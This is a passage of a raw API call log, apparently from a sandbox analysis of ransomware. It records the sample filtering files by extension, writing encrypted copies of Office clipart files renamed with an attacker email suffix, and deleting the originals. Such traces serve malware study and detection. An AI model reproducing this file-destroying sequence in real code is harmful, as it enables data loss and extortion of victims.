lpString2=".WMF") returned -1 [0182.473] lstrlenW (lpString=".bz2") returned 4 [0182.473] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.473] lstrlenW (lpString=".7z") returned 3 [0182.473] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 68 [0182.473] lstrlenW (lpString=".dbf") returned 4 [0182.473] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 68 [0182.473] lstrlenW (lpString=".1cd") returned 4 [0182.473] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 68 [0182.473] lstrlenW (lpString=".jpg") returned 4 [0182.473] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 68 [0182.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 68 [0182.473] lstrlenW (lpString=".doc") returned 4 [0182.473] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.473] lstrlenW (lpString=".docx") returned 5 [0182.473] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.473] lstrlenW (lpString=".pdf") returned 4 [0182.473] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.473] lstrlenW (lpString=".xls") returned 4 [0182.473] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.473] lstrlenW (lpString=".xlsx") returned 5 [0182.473] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0182.473] lstrlenW (lpString=".ppt") returned 4 [0182.473] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 68 [0182.474] lstrlenW (lpString=".zip") returned 4 [0182.474] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.474] lstrlenW (lpString=".rar") returned 4 [0182.474] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.474] lstrlenW (lpString=".bz2") returned 4 [0182.474] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.474] lstrlenW (lpString=".7z") returned 3 [0182.474] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 68 [0182.474] lstrlenW (lpString=".dbf") returned 4 [0182.474] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 68 [0182.474] lstrlenW (lpString=".1cd") returned 4 [0182.474] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 68 [0182.474] lstrlenW (lpString=".jpg") returned 4 [0182.474] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.475] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.475] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105974.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0182.475] GetLastError () returned 0x0 [0182.475] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x1204, lpOverlapped=0x0) returned 1 [0182.477] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1210, lpOverlapped=0x0) returned 1 [0182.479] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.479] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.479] SetEndOfFile (hFile=0x36c) returned 1 [0182.479] CloseHandle (hObject=0x36c) returned 1 [0182.479] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.479] SetEndOfFile (hFile=0x364) returned 1 [0182.480] CloseHandle (hObject=0x364) returned 1 [0182.480] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.481] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105974.wmf")) returned 1 [0182.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF") returned 68 [0182.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF") returned 68 [0182.481] lstrlenW (lpString=".doc") returned 4 [0182.481] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.481] lstrlenW (lpString=".docx") returned 5 [0182.481] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.481] lstrlenW (lpString=".pdf") returned 4 [0182.481] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.482] lstrlenW (lpString=".xls") returned 4 [0182.482] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.482] lstrlenW (lpString=".xlsx") returned 5 [0182.482] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.482] lstrlenW (lpString=".ppt") returned 4 [0182.482] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF") returned 68 [0182.482] lstrlenW (lpString=".zip") returned 4 [0182.482] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.482] lstrlenW (lpString=".rar") returned 4 [0182.482] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.482] lstrlenW (lpString=".bz2") returned 4 [0182.482] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.482] lstrlenW (lpString=".7z") returned 3 [0182.482] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF") returned 68 [0182.482] lstrlenW (lpString=".dbf") returned 4 [0182.482] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF") returned 68 [0182.482] lstrlenW (lpString=".1cd") returned 4 [0182.482] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF") returned 68 [0182.483] lstrlenW (lpString=".jpg") returned 4 [0182.483] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.483] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.483] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106020.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0182.484] GetLastError () returned 0x0 [0182.484] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x274c, lpOverlapped=0x0) returned 1 [0182.486] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x2750, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x2750, lpOverlapped=0x0) returned 1 [0182.487] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.487] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.487] SetEndOfFile (hFile=0x36c) returned 1 [0182.488] CloseHandle (hObject=0x36c) returned 1 [0182.488] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.488] SetEndOfFile (hFile=0x364) returned 1 [0182.489] CloseHandle (hObject=0x364) returned 1 [0182.489] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.489] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106020.wmf")) returned 1 [0182.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF") returned 68 [0182.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF") returned 68 [0182.490] lstrlenW (lpString=".doc") returned 4 [0182.490] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.490] lstrlenW (lpString=".docx") returned 5 [0182.490] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.490] lstrlenW (lpString=".pdf") returned 4 [0182.490] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.490] lstrlenW (lpString=".xls") returned 4 [0182.490] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.490] lstrlenW (lpString=".xlsx") returned 5 [0182.490] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.490] lstrlenW (lpString=".ppt") returned 4 [0182.490] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF") returned 68 [0182.490] lstrlenW (lpString=".zip") returned 4 [0182.490] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.490] lstrlenW (lpString=".rar") returned 4 [0182.490] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.490] lstrlenW (lpString=".bz2") returned 4 [0182.490] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.490] lstrlenW (lpString=".7z") returned 3 [0182.490] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF") returned 68 [0182.490] lstrlenW (lpString=".dbf") returned 4 [0182.490] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF") returned 68 [0182.491] lstrlenW (lpString=".1cd") returned 4 [0182.491] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF") returned 68 [0182.491] lstrlenW (lpString=".jpg") returned 4 [0182.491] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.491] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.491] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106124.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0182.492] GetLastError () returned 0x0 [0182.492] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x16b4, lpOverlapped=0x0) returned 1 [0182.786] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x16c0, lpOverlapped=0x0) returned 1 [0182.787] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.787] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.787] SetEndOfFile (hFile=0x36c) returned 1 [0182.787] CloseHandle (hObject=0x36c) returned 1 [0182.787] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.787] SetEndOfFile (hFile=0x364) returned 1 [0182.788] CloseHandle (hObject=0x364) returned 1 [0182.788] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.788] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106124.wmf")) returned 1 [0182.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF") returned 68 [0182.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF") returned 68 [0182.789] lstrlenW (lpString=".doc") returned 4 [0182.789] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.789] lstrlenW (lpString=".docx") returned 5 [0182.789] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.789] lstrlenW (lpString=".pdf") returned 4 [0182.789] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.789] lstrlenW (lpString=".xls") returned 4 [0182.789] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.789] lstrlenW (lpString=".xlsx") returned 5 [0182.789] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.789] lstrlenW (lpString=".ppt") returned 4 [0182.789] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF") returned 68 [0182.789] lstrlenW (lpString=".zip") returned 4 [0182.789] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.789] lstrlenW (lpString=".rar") returned 4 [0182.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.789] lstrlenW (lpString=".bz2") returned 4 [0182.789] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.789] lstrlenW (lpString=".7z") returned 3 [0182.789] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF") returned 68 [0182.789] lstrlenW (lpString=".dbf") returned 4 [0182.789] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF") returned 68 [0182.789] lstrlenW (lpString=".1cd") returned 4 [0182.790] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF") returned 68 [0182.790] lstrlenW (lpString=".jpg") returned 4 [0182.790] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.790] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.790] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0182.790] GetLastError () returned 0x0 [0182.791] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x3734, lpOverlapped=0x0) returned 1 [0182.793] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x3740, lpOverlapped=0x0) returned 1 [0182.794] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.794] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.795] SetEndOfFile (hFile=0x36c) returned 1 [0182.797] CloseHandle (hObject=0x36c) returned 1 [0182.797] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.797] SetEndOfFile (hFile=0x364) returned 1 [0182.798] CloseHandle (hObject=0x364) returned 1 [0182.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.798] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf")) returned 1 [0182.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0182.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0182.799] lstrlenW (lpString=".doc") returned 4 [0182.799] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.799] lstrlenW (lpString=".docx") returned 5 [0182.799] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.799] lstrlenW (lpString=".pdf") returned 4 [0182.799] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.799] lstrlenW (lpString=".xls") returned 4 [0182.799] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.799] lstrlenW (lpString=".xlsx") returned 5 [0182.799] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.799] lstrlenW (lpString=".ppt") returned 4 [0182.799] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0182.799] lstrlenW (lpString=".zip") returned 4 [0182.799] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.799] lstrlenW (lpString=".rar") returned 4 [0182.799] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.799] lstrlenW (lpString=".bz2") returned 4 [0182.799] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.799] lstrlenW (lpString=".7z") returned 3 [0182.799] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0182.799] lstrlenW (lpString=".dbf") returned 4 [0182.799] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0182.799] lstrlenW (lpString=".1cd") returned 4 [0182.799] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0182.799] lstrlenW (lpString=".jpg") returned 4 [0182.799] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.800] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.800] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0182.800] GetLastError () returned 0x0 [0182.800] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x69cc, lpOverlapped=0x0) returned 1 [0182.803] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x69d0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x69d0, lpOverlapped=0x0) returned 1 [0182.804] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.804] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.804] SetEndOfFile (hFile=0x36c) returned 1 [0182.804] CloseHandle (hObject=0x36c) returned 1 [0182.804] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.804] SetEndOfFile (hFile=0x364) returned 1 [0182.805] CloseHandle (hObject=0x364) returned 1 [0182.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.805] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf")) returned 1 [0182.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF") returned 68 [0182.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF") returned 68 [0182.806] lstrlenW (lpString=".doc") returned 4 [0182.806] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.806] lstrlenW (lpString=".docx") returned 5 [0182.806] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.806] lstrlenW (lpString=".pdf") returned 4 [0182.806] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.806] lstrlenW (lpString=".xls") returned 4 [0182.806] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.806] lstrlenW (lpString=".xlsx") returned 5 [0182.806] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.806] lstrlenW (lpString=".ppt") returned 4 [0182.806] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.806] lstrlenW (lpString="C:\\Program Files\\Microsoft 